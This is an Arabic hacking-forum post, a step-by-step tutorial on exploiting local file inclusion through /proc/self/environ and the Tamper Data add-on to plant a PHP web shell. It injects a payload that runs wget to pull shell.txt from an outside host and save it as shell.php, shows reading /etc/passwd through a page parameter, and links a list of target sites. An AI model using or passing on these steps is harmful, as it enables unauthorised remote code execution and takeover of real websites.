عرض مشاركة واحدة
قديم 06-04-2012, 04:41 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Abo MalaK
 
الصورة الرمزية Abo MalaK
 

 

 
إحصائية العضو







Abo MalaK غير متواجد حالياً

إرسال رسالة عبر MSN إلى Abo MalaK

 

 

إحصائية الترشيح

عدد النقاط : 10
Abo MalaK is on a distinguished road

Talking رفع الشل من خلال ثغرات lif عبر Tamper Data


السلام عليكم ورحمة الله وبركاتة

كيفكم اخواني اتمنا الجميع بخير وصحة وعافية

حبيت اطرح هاذا الشرح لجل الافادة واتمنا انه يفديكم

المتطلبات
1. FireFox [download]
2. Tamper Data [download]
والموقع المراد التطبيق علية

انا جبت لكم كم موقع

http://pastie.org/private/7fbtucb1obczki7nk0xvxa


طيب نكمل

في البداية لازم نقدر نقرى proc/self/environ

اضغط هنا لترى الصورة بحجمها الطبيعى

بعد مايضبط الشغل نروح نشغل اداة تمبلر داتا

بعد ماتشتغل معنا الاداة
نروح لم



بعدها نروح لم الموقع حقنا ونعمل تحديث وراح تخرج لن هل النافذة



بعدها نروح للمربع هاذا





في هاذا المربع وضعنا
<?php phpinfo();?>


عشان نقرة phpinfo ونضمن الشغل

بعد ماتضغط اوك راح تخرج لك كم نافضة اضغط على الكل



بعدها ماتضغط وتتخطى

يفتح الموقع ويتم قراة phpinfo



ومنها راح نشوف ادوال والسيف مود وغيرها امر مهم قبل رفع الشل



<?exec('wget http://www.site.com/shell.txt -O shell.php');?>

هاذي هي الدالة exec الي راح نسخدمها لسحب الملف طبعن تقدر تغيرها اذا كانت ممنوعه
الى chmod
system

ومع شوي تطوير راح تضبط

بعدها

نروح نشوف

راح يفتح الموقع مثل ماكان

طيب لما تنتهي من الحقن مثال هل الموقع
http://www.site.com/index.php?page=/etc/passwd
نمسح
index.php?page=/etc/passwd

ونحط
http://www.site.com/shell.php


وباذن الله راح يتم الرفع الشل

منقول للفائده،



vtu hgag lk oghg eyvhj lif ufv Tamper Data

التوقيع

استغفر الله العظيم
استغفر الله العظيم من كل فرض تركـــــتــه
استغفر الله العظيم
من كل انسان ظلـمـتــــه
استغفر الله العظيم
من كل صالح جـفــوتــــه
استغفر الله العظيم
من كل ظالم صاحـــبتــه
استغفر الله العظيم
من كل بـــر أجـــــلتـــــه
استغفر الله العظيم
من كل ناصح أهنــتـــــه
++
دعوآتكم لي،

 

   

رد مع اقتباس